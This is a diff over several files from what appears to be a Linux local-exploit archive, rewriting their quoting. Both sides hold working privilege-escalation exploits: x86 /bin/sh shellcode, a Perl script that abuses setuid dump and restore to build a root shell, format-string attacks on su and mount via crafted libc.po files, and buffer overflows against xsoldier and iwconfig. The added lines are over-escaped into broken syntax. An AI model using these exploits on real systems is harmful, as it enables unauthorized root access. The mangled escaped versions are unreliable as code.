 	char		gateway[ 1337 ];
 	char		host[ 1337 ];
-	char *		argv[] = { filename, "-g", "123", "-g", gateway, host, NULL };
+	char *		argv[] = { filename, \"-g\", \"123\", \"-g\", gateway, host, NULL };
 	unsigned int	next;
 	int		i;
 	unsigned int	hellcode;
 	unsigned int	size;
-	strcpy( host, "AAAABBBBCCCCDDDDEEEE" );
+	strcpy( host, \"AAAABBBBCCCCDDDDEEEE\" );
-	next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen("AAAA");
+	next = stack - (strlen(filename) + 1) - (strlen(host) + 1) + strlen(\"AAAA\");
 	for ( i = 0; i < next - (next & ~3); i++ ) {
-		strcat( host, "X" );
+		strcat( host, \"X\" );
 	}
 	next = next & ~3;
 	((unsigned int *)host)[1] = 0xffffffff & ~PREV_INUSE;
 	((unsigned int *)host)[2] = 0xffffffff;
 	if ( zero( victim - 12 ) ) {
-		fprintf( stderr, "Null byte(s) in `victim - 12' (0x%08x)!\n", victim - 12 );
+		fprintf( stderr, \"Null byte(s) in `victim - 12\' (0x%08x)!\\n\", victim - 12 );
 		return( -1 );
 	}
 	((unsigned int *)host)[3] = victim - 12;
-	hellcode = p + (strlen("123") + 1) + strlen("0x42.0x42.0x42.0x42") + strlen(" ");
+	hellcode = p + (strlen(\"123\") + 1) + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \");
 	if ( zero( hellcode ) ) {
-		fprintf( stderr, "Null byte(s) in `host' (0x%08x)!\n", hellcode );
+		fprintf( stderr, \"Null byte(s) in `host\' (0x%08x)!\\n\", hellcode );
 		return( -1 );
 	}
 	((unsigned int *)host)[4] = hellcode;
@ -102,31 +102,31 @@ int main()
 	size = size | PREV_INUSE;
 	sprintf(
 		gateway,
-		"0x%02x.0x%02x.0x%02x.0x%02x",
+		\"0x%02x.0x%02x.0x%02x.0x%02x\",
 		((unsigned char *)(&size))[0],
 		((unsigned char *)(&size))[1],
 		((unsigned char *)(&size))[2],
 		((unsigned char *)(&size))[3]
 	);
-	strcat( gateway, " " );
+	strcat( gateway, \" \" );
 	strcat( gateway, jmp );
 	strcat( gateway, shellcode );
 	strcat( gateway, program );
 	hellcode += strlen(jmp) + strlen(shellcode);
 	if ( zero( hellcode ) ) {
-		fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
+		fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode );
 		return( -1 );
 	}
-	*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 7)) = hellcode;
+	*((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 7)) = hellcode;
 	hellcode += strlen(program) + 1;
 	if ( zero( hellcode ) ) {
-		fprintf( stderr, "Null byte(s) in `gateway' (0x%08x)!\n", hellcode );
+		fprintf( stderr, \"Null byte(s) in `gateway\' (0x%08x)!\\n\", hellcode );
 		return( -1 );
 	}
-	*((unsigned int *)(gateway + strlen("0x42.0x42.0x42.0x42") + strlen(" ") + strlen(jmp) + 12)) = hellcode;
+	*((unsigned int *)(gateway + strlen(\"0x42.0x42.0x42.0x42\") + strlen(\" \") + strlen(jmp) + 12)) = hellcode;
 	execve( argv[0], argv, NULL );
 	return( -1 );
--- a/platforms/linux/local/184.pl
+++ b/platforms/linux/local/184.pl
@ -5,134 +5,134 @@
 # written by tlabs
 # Use at your discretion
-$EXPORT1="TAPE=garbage:garbage" ;
+$EXPORT1=\"TAPE=garbage:garbage\" ;
-$EXPORT2="RSH=./hey" ;
+$EXPORT2=\"RSH=./hey\" ;
 sub USAGE
 {
-  print "$0 <type>\n1=dump 2=dump.static 3=restore 4=restore.staic\nYour choice innit;)\nWritten by Tlabs\n" ;
+  print \"$0 <type>\\n1=dump 2=dump.static 3=restore 4=restore.staic\\nYour choice innit;)\\nWritten by Tlabs\\n\" ;
  exit 0 ;
 }
 sub ERROR
 {
-  print "$_[0]\n" ;
+  print \"$_[0]\\n\" ;
  exit 0 ;
 }
-open(TEMP, ">shell.c")|| ERROR("Something went wrong:$!");
+open(TEMP, \">shell.c\")|| ERROR(\"Something went wrong:$!\");
-printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
+printf TEMP \"#include<unistd.h>\\n#include<stdlib.h>\\nint main()\\n{\" ;
-printf TEMP "    setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}" ;
+printf TEMP \"    setuid(0);\\n\\tsetgid(0);\\n\\texecl(\\\"/bin/sh\\\",\\\"sh\\\",0);\\n\\treturn 0;\\n}\" ;
 close(TEMP);
-system "cc -o shell shell.c" ;
+system \"cc -o shell shell.c\" ;
-unlink "shell.c" ;
+unlink \"shell.c\" ;
-open(TEMP1, ">hey")|| ERROR("Something went wrong: $!");
+open(TEMP1, \">hey\")|| ERROR(\"Something went wrong: $!\");
-printf TEMP1 "#!/bin/sh\nchown root shell\nchmod 4755 shell" ;
+printf TEMP1 \"#!/bin/sh\\nchown root shell\\nchmod 4755 shell\" ;
 close(TEMP1);
-chmod(0755, "hey");
+chmod(0755, \"hey\");
-if ($ARGV[$0] eq "1")
+if ($ARGV[$0] eq \"1\")
 {
-  $DUMPER="/sbin/dump" ;
+  $DUMPER=\"/sbin/dump\" ;
-  if ( -u "$DUMPER" )
+  if ( -u \"$DUMPER\" )
  {
-    system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ;
+    system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ;
    sleep(3);
-    if ( -u "shell" )
+    if ( -u \"shell\" )
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      system "./shell" ;
+      system \"./shell\" ;
    }
    else
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      unlink "shell" ;
+      unlink \"shell\" ;
-      print "Something fucked at the last, sorry" ;
+      print \"Something fucked at the last, sorry\" ;
    }
   }
   else
   {
-     unlink "hey" ;
+     unlink \"hey\" ;
-     unlink "shell" ;
+     unlink \"shell\" ;
-     printf "Dump is not exploitable on this system\n";
+     printf \"Dump is not exploitable on this system\\n\";
   }
 }
-elsif ($ARGV[$0] eq "2")
+elsif ($ARGV[$0] eq \"2\")
 {
-  $DUMPER="/sbin/dump.static" ;
+  $DUMPER=\"/sbin/dump.static\" ;
-  if ( -u "$DUMPER" )
+  if ( -u \"$DUMPER\" )
  {
-    system "export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \/" ;
+    system \"export $EXPORT1 ;export $EXPORT2 ; $DUMPER -0 \\/\" ;
    sleep(3);
-    if ( -u "shell" )
+    if ( -u \"shell\" )
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      system "./shell" ;
+      system \"./shell\" ;
    }
    else
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      unlink "shell" ;
+      unlink \"shell\" ;
-      print "Something fucked at the last, sorry" ;
+      print \"Something fucked at the last, sorry\" ;
    }
  }
  else
  {
-    unlink "hey" ;
+    unlink \"hey\" ;
-    unlink "shell" ;
+    unlink \"shell\" ;
-    printf "Dump.static is not exploitable on this system\n";
+    printf \"Dump.static is not exploitable on this system\\n\";
  }
 }
-elsif ($ARGV[$0] eq "3")
+elsif ($ARGV[$0] eq \"3\")
 {
-  $RESTORER="/sbin/restore" ;
+  $RESTORER=\"/sbin/restore\" ;
-  if ( -u "$RESTORER" )
+  if ( -u \"$RESTORER\" )
  {
-    system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ;
+    system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ;
    sleep(3);
-    if ( -u "shell" )
+    if ( -u \"shell\" )
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      system "./shell" ;
+      system \"./shell\" ;
    }
    else
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      unlink "shell" ;
+      unlink \"shell\" ;
-      print "Something fucked at the last, sorry" ;
+      print \"Something fucked at the last, sorry\" ;
    }
  }
  else
  {
-    unlink "hey" ;
+    unlink \"hey\" ;
-    unlink "shell" ;
+    unlink \"shell\" ;
-    printf "Restore is not exploitable on this system\n";
+    printf \"Restore is not exploitable on this system\\n\";
  }
 }
-elsif ($ARGV[$0] eq "4")
+elsif ($ARGV[$0] eq \"4\")
 {
-  $RESTORER="/sbin/restore.static" ;
+  $RESTORER=\"/sbin/restore.static\" ;
-  if ( -u "$RESTORER" )
+  if ( -u \"$RESTORER\" )
  {
-    system "export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i" ;
+    system \"export $EXPORT1 ; export $EXPORT2 ; $RESTORER -i\" ;
    sleep(3);
-    if ( -u "shell" )
+    if ( -u \"shell\" )
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      system "./shell" ;
+      system \"./shell\" ;
    }
    else
    {
-      unlink "hey" ;
+      unlink \"hey\" ;
-      unlink "shell" ;
+      unlink \"shell\" ;
-      print "Something fucked at the last, sorry" ;
+      print \"Something fucked at the last, sorry\" ;
    }
  }
  else
  {
-    unlink "hey" ;
+    unlink \"hey\" ;
-    unlink "shell" ;
+    unlink \"shell\" ;
-    printf "Restore.static is not exploitable on this system\n";
+    printf \"Restore.static is not exploitable on this system\\n\";
  }
 }
 else
--- a/platforms/linux/local/20185.c
+++ b/platforms/linux/local/20185.c
@ -43,16 +43,16 @@ It should be noted under Linux this problem must be exploited in conjunction wit
 #define DEFAULT_BUFFER_SIZE            2048
 #define DEFAULT_EGG_SIZE               1024
 #define NOP                            0x90
-#define PATH             "/tmp/LC_MESSAGES"
+#define PATH             \\\"/tmp/LC_MESSAGES\\\"
 char shellcode[] =
-  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+  \\\"\\\\xeb\\\\x1f\\\\x5e\\\\x89\\\\x76\\\\x08\\\\x31\\\\xc0\\\\x88\\\\x46\\\\x07\\\\x89\\\\x46\\\\x0c\\\\xb0\\\\x0b\\\"
-  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+  \\\"\\\\x89\\\\xf3\\\\x8d\\\\x4e\\\\x08\\\\x8d\\\\x56\\\\x0c\\\\xcd\\\\x80\\\\x31\\\\xdb\\\\x89\\\\xd8\\\\x40\\\\xcd\\\"
-  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+  \\\"\\\\x80\\\\xe8\\\\xdc\\\\xff\\\\xff\\\\xff/bin/sh\\\";
 unsigned long get_esp(void) {
-   __asm__("movl %esp,%eax");
+   __asm__(\\\"movl %esp,%eax\\\");
 }
@ -65,7 +65,7 @@ unsigned long get_esp(void) {
  int i,reth,retl,num=113;
  FILE *fp;
-  if (argc > 1) sscanf(argv[1],"%x",&retloc);
+  if (argc > 1) sscanf(argv[1],\\\"%x\\\",&retloc);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) num = atoi(argv[3]);
  if (argc > 4) align = atoi(argv[4]);
@ -74,27 +74,27 @@ unsigned long get_esp(void) {
-  printf("Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \n",argv[0]);
+  printf(\\\"Usages: %s <RETloc> <offset> <num> <align> <buffsize> <eggsize> \\\\n\\\",argv[0]);
  if (!(buff = malloc(eggsize))) {
-       printf("Can't allocate memory.\n");
+       printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
       exit(0);
    }
  if (!(buff1 = malloc(bsize))) {
-       printf("Can't allocate memory.\n");
+       printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
       exit(0);
    }
  if (!(egg = malloc(eggsize))) {
-    printf("Can't allocate memory.\n");
+    printf(\\\"Can\\\'t allocate memory.\\\\n\\\");
    exit(0);
  }
-    printf("Using RET location address: 0x%x\n", retloc);
+    printf(\\\"Using RET location address: 0x%x\\\\n\\\", retloc);
    shell_addr = get_esp() + offset;
-    printf("Using Shellcode address: 0x%x\n", shell_addr);
+    printf(\\\"Using Shellcode address: 0x%x\\\\n\\\", shell_addr);
    reth = (shell_addr >> 16) & 0xffff ;
    retl = (shell_addr >>  0) & 0xffff ;
@ -102,7 +102,7 @@ unsigned long get_esp(void) {
    ptr = buff;
    for (i = 0; i <2 ; i++, retloc+=2 ){
-       memset(ptr,'A',4);
+       memset(ptr,\\\'A\\\',4);
       ptr += 4 ;
       (*ptr++) =  retloc & 0xff;
       (*ptr++) = (retloc >> 8  ) & 0xff ;
@ -110,27 +110,27 @@ unsigned long get_esp(void) {
       (*ptr++) = (retloc >> 24 ) & 0xff ;
      }
-     memset(ptr,'A',align);
+     memset(ptr,\\\'A\\\',align);
     ptr = buff1;
     for(i = 0 ; i < num ; i++ )
     {
-        memcpy(ptr, "%.8x", 4);
+        memcpy(ptr, \\\"%.8x\\\", 4);
        ptr += 4;
     }
-     sprintf(ptr, "%%%uc%%hn%%%uc%%hn",(retl - num*8),
+     sprintf(ptr, \\\"%%%uc%%hn%%%uc%%hn\\\",(retl - num*8),
              (0x10000 + reth - retl));
    mkdir(PATH,0755);
    chdir(PATH);
-    fp = fopen("libc.po", "w+");
+    fp = fopen(\\\"libc.po\\\", \\\"w+\\\");
-    fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
+    fprintf(fp,\\\"msgid \\\\\\\"%%s: invalid option -- %%c\\\\\\\\n\\\\\\\"\\\\n\\\");
-    fprintf(fp,"msgstr \"%s\\n\"", buff1);
+    fprintf(fp,\\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buff1);
    fclose(fp);
-    system("/usr/bin/msgfmt libc.po -o libc.mo");
+    system(\\\"/usr/bin/msgfmt libc.po -o libc.mo\\\");
    ptr = egg;
@ -140,13 +140,13 @@ unsigned long get_esp(void) {
    for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];
-    egg[eggsize - 1] = '\0';
+    egg[eggsize - 1] = \\\'\\\\0\\\';
-    memcpy(egg, "EGG=", 4);
+    memcpy(egg, \\\"EGG=\\\", 4);
    env[0] = egg ;
-    env[1] = "LANGUAGE=sk_SK/../../../../../../tmp";
+    env[1] = \\\"LANGUAGE=sk_SK/../../../../../../tmp\\\";
    env[2] = (char *)0 ;
-    execle("/bin/su","su","-u", buff, NULL,env);
+    execle(\\\"/bin/su\\\",\\\"su\\\",\\\"-u\\\", buff, NULL,env);
 }  /* end of main */
--- a/platforms/linux/local/215.c
+++ b/platforms/linux/local/215.c
@ -6,7 +6,7 @@
 *  Redhat 6.2 (mount-2.10f)        : ./mnt -n 114 -a 0x080565dc -i 112
 *  compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112
 *
- *      "objdump /bin/mount | grep exit" to get the -a address
+ *      \\\"objdump /bin/mount | grep exit\\\" to get the -a address
 *
 *                                                         - sk8
 */
@ -17,32 +17,32 @@
 char sc[]=
  /* main: */                            /* setreuid(0, 0);          */
-  "\x29\xc0"                             /* subl %eax, %eax          */
+  \\\"\\\\x29\\\\xc0\\\"                             /* subl %eax, %eax          */
-  "\xb0\x46"                             /* movb $70, %al            */
+  \\\"\\\\xb0\\\\x46\\\"                             /* movb $70, %al            */
-  "\x29\xdb"                             /* subl %ebx, %ebx          */
+  \\\"\\\\x29\\\\xdb\\\"                             /* subl %ebx, %ebx          */
-  "\xb3\x0c"                             /* movb $12, %bl            */
+  \\\"\\\\xb3\\\\x0c\\\"                             /* movb $12, %bl            */
-  "\x80\xeb\x0c"                         /* subb $12, %bl */
+  \\\"\\\\x80\\\\xeb\\\\x0c\\\"                         /* subb $12, %bl */
-  "\x89\xd9"                             /* movl %ebx, %ecx          */
+  \\\"\\\\x89\\\\xd9\\\"                             /* movl %ebx, %ecx          */
-  "\xcd\x80"                             /* int $0x80                */
+  \\\"\\\\xcd\\\\x80\\\"                             /* int $0x80                */
-  "\xeb\x18"                             /* jmp callz                */
+  \\\"\\\\xeb\\\\x18\\\"                             /* jmp callz                */
  /* start: */                           /* execve of /bin/sh        */
-  "\x5e"                                 /* popl %esi                */
+  \\\"\\\\x5e\\\"                                 /* popl %esi                */
-  "\x29\xc0"                             /* subl %eax, %eax          */
+  \\\"\\\\x29\\\\xc0\\\"                             /* subl %eax, %eax          */
-  "\x88\x46\x07"                         /* movb %al, 0x07(%esi)     */
+  \\\"\\\\x88\\\\x46\\\\x07\\\"                         /* movb %al, 0x07(%esi)     */
-  "\x89\x46\x0c"                         /* movl %eax, 0x0c(%esi)    */
+  \\\"\\\\x89\\\\x46\\\\x0c\\\"                         /* movl %eax, 0x0c(%esi)    */
-  "\x89\x76\x08"                         /* movl %esi, 0x08(%esi)    */
+  \\\"\\\\x89\\\\x76\\\\x08\\\"                         /* movl %esi, 0x08(%esi)    */
-  "\xb0\x0b"                             /* movb $0x0b, %al          */
+  \\\"\\\\xb0\\\\x0b\\\"                             /* movb $0x0b, %al          */
-  "\x87\xf3"                             /* xchgl %esi, %ebx         */
+  \\\"\\\\x87\\\\xf3\\\"                             /* xchgl %esi, %ebx         */
-  "\x8d\x4b\x08"                         /* leal 0x08(%ebx), %ecx    */
+  \\\"\\\\x8d\\\\x4b\\\\x08\\\"                         /* leal 0x08(%ebx), %ecx    */
-  "\x8d\x53\x0c"                         /* leal 0x0c(%ebx), %edx    */
+  \\\"\\\\x8d\\\\x53\\\\x0c\\\"                         /* leal 0x0c(%ebx), %edx    */
-  "\xcd\x80"                             /* int $0x80                */
+  \\\"\\\\xcd\\\\x80\\\"                             /* int $0x80                */
  /* callz: */
-  "\xe8\xe3\xff\xff\xff"                 /* call start               */
+  \\\"\\\\xe8\\\\xe3\\\\xff\\\\xff\\\\xff\\\"                 /* call start               */
  /* /bin/sh */
-  "\x2f\x62\x69\x6e\x2f\x73\x68";
+  \\\"\\\\x2f\\\\x62\\\\x69\\\\x6e\\\\x2f\\\\x73\\\\x68\\\";
 int main(int argc, char** argv) {
  FILE* fp;
@ -50,7 +50,7 @@ int main(int argc, char** argv) {
  char buffer[20000], fmtbuf[1000], numbuf[2000];
  int shloc=0xbfffdaa0;
  int i=0, c=0; 
-  char mode='n';
+  char mode=\\\'n\\\';
  int debug=0;
  int eiploc=0xbffffdc0;
  char* envbuf[2];
@ -65,20 +65,20 @@ int main(int argc, char** argv) {
  memset(buffer, 0, sizeof(buffer));
  memset(fmtbuf, 0, sizeof(fmtbuf));
  memset(numbuf, 0, sizeof(numbuf));
-  printf("heapaddr: 0x%x\n", heapaddr);
+  printf(\\\"heapaddr: 0x%x\\\\n\\\", heapaddr);
  c=0;
-  strcpy (xpath, "/bin/mount");
+  strcpy (xpath, \\\"/bin/mount\\\");
-  while ((s=getopt(argc, argv, "p:s:b:e:a:n:i:d")) != EOF) {
+  while ((s=getopt(argc, argv, \\\"p:s:b:e:a:n:i:d\\\")) != EOF) {
    switch(s) {
-      case 's': shloc=strtoul(optarg, 0, 0); break;
+      case \\\'s\\\': shloc=strtoul(optarg, 0, 0); break;
-      case 'b': bpad=atoi(optarg); break;
+      case \\\'b\\\': bpad=atoi(optarg); break;
-      case 'e': epad=atoi(optarg); break;
+      case \\\'e\\\': epad=atoi(optarg); break;
-      case 'a': eiploc=strtoul(optarg, 0, 0); break;
+      case \\\'a\\\': eiploc=strtoul(optarg, 0, 0); break;
-      case 'n': nump=atoi(optarg); break;
+      case \\\'n\\\': nump=atoi(optarg); break;
-      case 'i': inc=atoi(optarg); break;
+      case \\\'i\\\': inc=atoi(optarg); break;
-      case 'p': strcpy(xpath, optarg); break;
+      case \\\'p\\\': strcpy(xpath, optarg); break;
-      case 'd': debug=1; break;
+      case \\\'d\\\': debug=1; break;
      default: 
    }
  }
@ -87,16 +87,16 @@ int main(int argc, char** argv) {
  if (epad < 0) epad+=16;
  for (i=0; i < nump; i++) {
-    buffer[c++]='%';
+    buffer[c++]=\\\'%\\\';
-    buffer[c++]='8';
+    buffer[c++]=\\\'8\\\';
-    buffer[c++]='x';
+    buffer[c++]=\\\'x\\\';
  }
-  if (debug) { mode='p';
+  if (debug) { mode=\\\'p\\\';
-    strcpy(sc, "AAAA");
+    strcpy(sc, \\\"AAAA\\\");
    numnops=0;
  }
-  printf("cur strlen: %i\n", strlen(buffer));
+  printf(\\\"cur strlen: %i\\\\n\\\", strlen(buffer));
  /* size of executed program (/bin/mount) does not seem to affect these calculations
     it does affect location of eip however, (which is why its nice to just overwrite exit 
@ -111,58 +111,58 @@ int main(int argc, char** argv) {
  num[3]=((shloc >> 24) & 0xff)+1;
  if (num[3] < 0) num[3]+=256;
-  sprintf(fmtbuf, "%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c", num[0]
+  sprintf(fmtbuf, \\\"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\\\", num[0]
    , mode, num[1], mode, num[2], mode, num[3], mode);
-  printf("fmtbuf: %s\n", fmtbuf);
+  printf(\\\"fmtbuf: %s\\\\n\\\", fmtbuf);
-  printf("strlen(fmtbuf): %i\n", strlen(fmtbuf));
+  printf(\\\"strlen(fmtbuf): %i\\\\n\\\", strlen(fmtbuf));
  memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf));
  memset(buffer+strlen(buffer), 0x90, numnops);
  memcpy(buffer+strlen(buffer), sc, strlen(sc));
-  mkdir("/tmp/sk8", 0755);
+  mkdir(\\\"/tmp/sk8\\\", 0755);
-  mkdir("/tmp/sk8/LC_MESSAGES", 0755);
+  mkdir(\\\"/tmp/sk8/LC_MESSAGES\\\", 0755);
-  if ( ! (fp=fopen("/tmp/sk8/LC_MESSAGES/libc.po", "w") ) ) {
+  if ( ! (fp=fopen(\\\"/tmp/sk8/LC_MESSAGES/libc.po\\\", \\\"w\\\") ) ) {
-    printf("could not create bad libc.po\n");
+    printf(\\\"could not create bad libc.po\\\\n\\\");
    exit(-1);
  }  
-  fprintf(fp, "msgid \"%%s: unrecognized option `--%%s'\\n\"\n");
+  fprintf(fp, \\\"msgid \\\\\\\"%%s: unrecognized option `--%%s\\\'\\\\\\\\n\\\\\\\"\\\\n\\\");
-  fprintf(fp, "msgstr \"%s\\n\"", buffer);
+  fprintf(fp, \\\"msgstr \\\\\\\"%s\\\\\\\\n\\\\\\\"\\\", buffer);
  fclose(fp);
-  system("msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo");
+  system(\\\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\\\");
  c=0;
-  numbuf[c++]='-';
+  numbuf[c++]=\\\'-\\\';
-  numbuf[c++]='-';
+  numbuf[c++]=\\\'-\\\';
-  memset(numbuf+strlen(numbuf), 'B', bpad);
+  memset(numbuf+strlen(numbuf), \\\'B\\\', bpad);
-  memcpy(numbuf+strlen(numbuf), "PPPP", 4);
+  memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
  *(long*)(numbuf+strlen(numbuf))=eiploc;
-  memcpy(numbuf+strlen(numbuf), "PPPP", 4);
+  memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
  *(long*)(numbuf+strlen(numbuf))=eiploc+1;
-  memcpy(numbuf+strlen(numbuf), "PPPP", 4);
+  memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
  *(long*)(numbuf+strlen(numbuf))=eiploc+2;
-  memcpy(numbuf+strlen(numbuf), "PPPP", 4);
+  memcpy(numbuf+strlen(numbuf), \\\"PPPP\\\", 4);
  *(long*)(numbuf+strlen(numbuf))=eiploc+3;
-  printf("cur numbuf length: %i\n", strlen(numbuf));
+  printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf));
-  memset(numbuf+strlen(numbuf), 'Z', epad);
+  memset(numbuf+strlen(numbuf), \\\'Z\\\', epad);
-  printf("cur numbuf length: %i\n", strlen(numbuf));
+  printf(\\\"cur numbuf length: %i\\\\n\\\", strlen(numbuf));
-  envbuf[0]="LANGUAGE=en_GB/../../../../tmp/sk8/";
+  envbuf[0]=\\\"LANGUAGE=en_GB/../../../../tmp/sk8/\\\";
  envbuf[1]=0;
-  printf("strlen(numbuf): %i\n", strlen(numbuf));
+  printf(\\\"strlen(numbuf): %i\\\\n\\\", strlen(numbuf));
-  printf("bpad: %i; epad: %i\n", bpad, epad);  
+  printf(\\\"bpad: %i; epad: %i\\\\n\\\", bpad, epad);  
-  printf("number of %%p's to traverse stack: %i\n", nump);
+  printf(\\\"number of %%p\\\'s to traverse stack: %i\\\\n\\\", nump);
-  printf("address of eip: 0x%x\n", eiploc);
+  printf(\\\"address of eip: 0x%x\\\\n\\\", eiploc);
-  printf("inc: %i\n", inc);
+  printf(\\\"inc: %i\\\\n\\\", inc);
-  execle(xpath, "mount", numbuf, 0, envbuf);  
+  execle(xpath, \\\"mount\\\", numbuf, 0, envbuf);  
 }
--- a/platforms/linux/local/229.c
+++ b/platforms/linux/local/229.c
@ -7,15 +7,15 @@
 #define RANGE 20
 unsigned char blah[] =
-  "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
+  \"\\xeb\\x03\\x5e\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc6\\x0d\\x31\\xc9\\xb1\\x6c\\x80\\x36\\x01\\x46\\xe2\\xfa\"
-  "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
+  \"\\xea\\x09\\x2e\\x63\\x68\\x6f\\x2e\\x72\\x69\\x01\\x80\\xed\\x66\\x2a\\x01\\x01\"
-  "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
+  \"\\x54\\x88\\xe4\\x82\\xed\\x1d\\x56\\x57\\x52\\xe9\\x01\\x01\\x01\\x01\\x5a\\x80\\xc2\\xc7\\x11\"
-  "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
+  \"\\x01\\x01\\x8c\\xba\\x1f\\xee\\xfe\\xfe\\xc6\\x44\\xfd\\x01\\x01\\x01\\x01\\x88\\x7c\\xf9\\xb9\"
-  "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
+  \"\\x47\\x01\\x01\\x01\\x30\\xf7\\x30\\xc8\\x52\\x88\\xf2\\xcc\\x81\\x8c\\x4c\\xf9\\xb9\\x0a\\x01\"
-  "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
+  \"\\x01\\x01\\x88\\xff\\x30\\xd3\\x52\\x88\\xf2\\xcc\\x81\\x30\\xc1\\x5a\\x5f\\x5e\\x88\\xed\\x5c\"
-  "\xc2\x91";
+  \"\\xc2\\x91\";
-long get_sp () { __asm__ ("mov %esp, %eax"); }
+long get_sp () { __asm__ (\"mov %esp, %eax\"); }
 int
 main (int argc, char *argv[])
@ -38,10 +38,10 @@ main (int argc, char *argv[])
  for (i = i + strlen (blah); i < BUFSIZE; i += 4)
    *(long *) &buffer[i] = ret+offset;
-  fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\n");
+  fprintf(stderr, \"xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)\\n\");
-  fprintf(stderr, "zorgon@antionline.org\n");		
+  fprintf(stderr, \"zorgon@antionline.org\\n\");		
-  fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", ret + offset, offset, BUFSIZE);
+  fprintf(stderr, \"[return address = %x] [offset = %d] [buffer size = %d]\\n\", ret + offset, offset, BUFSIZE);
-  execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
+  execl (\"./xsoldier\", \"xsoldier\", \"-display\", buffer, 0);
 }
--- a/platforms/linux/local/23299.c
+++ b/platforms/linux/local/23299.c
@ -19,17 +19,17 @@ Exploit:
 /* x86/linux shellcode */
 char shellcode[]= /* 24 bytes */
-    "\x31\xc0" /* xorl %eax,%eax */
+    \"\\x31\\xc0\" /* xorl %eax,%eax */
-    "\x50" /* pushl %eax */
+    \"\\x50\" /* pushl %eax */
-    "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
+    \"\\x68\\x2f\\x2f\\x73\\x68\" /* pushl $0x68732f2f */
-    "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
+    \"\\x68\\x2f\\x62\\x69\\x6e\" /* pushl $0x6e69622f */
-    "\x89\xe3" /* movl %esp,%ebx */
+    \"\\x89\\xe3\" /* movl %esp,%ebx */
-    "\x50" /* pushl %eax */
+    \"\\x50\" /* pushl %eax */
-    "\x53" /* pushl %ebx */
+    \"\\x53\" /* pushl %ebx */
-    "\x89\xe1" /* movl %esp,%ecx */
+    \"\\x89\\xe1\" /* movl %esp,%ecx */
-    "\x99" /* cltd */
+    \"\\x99\" /* cltd */
-    "\xb0\x0b" /* movb $0x0b,%al */
+    \"\\xb0\\x0b\" /* movb $0x0b,%al */
-    "\xcd\x80"; /* int $0x80 */
+    \"\\xcd\\x80\"; /* int $0x80 */
 int main(int argc,char **argv){
@ -37,11 +37,11 @@ int main(int argc,char **argv){
   unsigned long ret;
   int i;
-   char *prog[]={"/sbin/iwconfig",buf,NULL};
+   char *prog[]={\"/sbin/iwconfig\",buf,NULL};
-   char *env[]={"HOME=/",shellcode,NULL};
+   char *env[]={\"HOME=/\",shellcode,NULL};
   ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
